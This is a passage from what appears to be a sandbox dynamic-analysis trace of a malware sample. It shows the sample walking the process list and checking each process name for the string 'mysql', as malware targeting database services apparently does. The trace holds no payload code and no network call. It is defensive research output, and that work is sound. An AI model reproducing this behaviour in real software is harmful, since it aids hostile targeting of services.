lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0177.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0177.161] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3595b08 [0177.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x3595b08, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0177.161] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0177.161] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="mysql") returned 0x0 [0177.161] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0177.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.162] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3581a48 [0177.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3581a48, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0177.162] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0177.162] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="mysql") returned 0x0 [0177.162] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0177.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.164] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35819a0 [0177.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x35819a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0177.164] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0177.164] StrStrIA (lpFirst="pending.exe", lpSrch="mysql") returned 0x0 [0177.164] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0177.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0177.165] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x3586368 [0177.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x3586368, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0177.165] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0177.165] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="mysql") returned 0x0 [0177.165] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0177.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0177.166] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3595d48 [0177.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x3595d48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0177.167] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0177.167] StrStrIA (lpFirst="swing prefer.exe", lpSrch="mysql") returned 0x0 [0177.167] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0177.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0177.168] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x3586598 [0177.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x3586598, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0177.168] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0177.168] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="mysql") returned 0x0 [0177.168] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0177.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0177.169] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3595ca8 [0177.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x3595ca8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0177.169] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0177.169] StrStrIA (lpFirst="nights-attending.exe", lpSrch="mysql") returned 0x0 [0177.169] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0177.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0177.170] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35818c8 [0177.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x35818c8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0177.170] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0177.171] StrStrIA (lpFirst="installed.exe", lpSrch="mysql") returned 0x0 [0177.171] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0177.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0177.172] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x35864d0 [0177.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x35864d0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0177.172] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0177.172] StrStrIA (lpFirst="references compounds.exe", lpSrch="mysql") returned 0x0 [0177.172] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0177.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0177.173] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3595be8 [0177.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x3595be8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0177.173] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0177.173] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="mysql") returned 0x0 [0177.173] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0177.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0177.192] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3595ba8 [0177.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x3595ba8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0177.193] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0177.193] StrStrIA (lpFirst="registered try.exe", lpSrch="mysql") returned 0x0 [0177.193] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0177.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0177.195] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3586688 [0177.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x3586688, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0177.195] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0177.195] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="mysql") returned 0x0 [0177.195] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0177.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.196] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35819e8 [0177.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x35819e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0177.196] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0177.196] StrStrIA (lpFirst="invite.exe", lpSrch="mysql") returned 0x0 [0177.196] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0177.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0177.197] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3581838 [0177.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3581838, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0177.197] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0177.197] StrStrIA (lpFirst="idol.exe", lpSrch="mysql") returned 0x0 [0177.197] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0177.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0177.198] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3586318 [0177.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x3586318, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0177.199] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0177.199] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="mysql") returned 0x0 [0177.199] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0177.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0177.200] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x35865c0 [0177.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x35865c0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0177.200] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0177.200] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="mysql") returned 0x0 [0177.200] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0177.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0177.201] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3581988 [0177.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x3581988, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0177.201] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0177.201] StrStrIA (lpFirst="powell_jane.exe", lpSrch="mysql") returned 0x0 [0177.201] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0177.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0177.203] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3595c48 [0177.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x3595c48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0177.203] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0177.203] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="mysql") returned 0x0 [0177.203] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0177.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0177.204] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3581ac0 [0177.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3581ac0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0177.204] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0177.204] StrStrIA (lpFirst="gainedshape.exe", lpSrch="mysql") returned 0x0 [0177.204] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0177.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0177.362] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3595ce8 [0177.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x3595ce8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0177.362] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0177.362] StrStrIA (lpFirst="opens-versions.exe", lpSrch="mysql") returned 0x0 [0177.362] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0177.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0177.364] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3586390 [0177.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x3586390, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0177.364] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0177.364] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="mysql") returned 0x0 [0177.364] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0177.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0177.365] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35818e0 [0177.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x35818e0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0177.365] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0177.365] StrStrIA (lpFirst="3dftp.exe", lpSrch="mysql") returned 0x0 [0177.365] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0177.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0177.366] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3595cc8 